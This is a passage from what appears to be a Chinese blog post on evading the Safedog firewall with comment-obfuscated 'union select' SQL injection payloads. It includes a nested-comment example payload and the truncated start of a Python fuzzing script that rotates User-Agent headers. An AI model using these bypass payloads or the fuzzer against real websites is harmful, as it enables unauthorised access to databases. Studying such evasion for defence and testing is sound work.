0x00:前言
本文主要讲述一些思路。仅供参考
0x01:过程
union与select 两位小家伙跟safedog的爱恨情仇
1、内联注释 /**/
正常响应
2、注释 特殊符号 /*特殊符号*/
正常响应
3、注释 特殊符号 字母 数字 /*特殊符号 数字 字母*/
正常响应
4、多层套用
栗子:/*!unoin/*/*/*/**/*select*/
0x02:FUZZ脚本编写
注:随机伪造UA头,每次请求都使用随机生成的UA头。为了减少复杂度,随机生成UA头的功能可以通过第三方模块库fake-useragent实现,
可以使用pip进行快速安装。
代码语言:javascript复制pip install fake-useragent
代码语言:javascript复制# ! -*- encoding:utf-8 -*-
#The author:@Jaky
import requests,time
def Jaky(url_start):
fuzz_aa = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', ' ', '|', '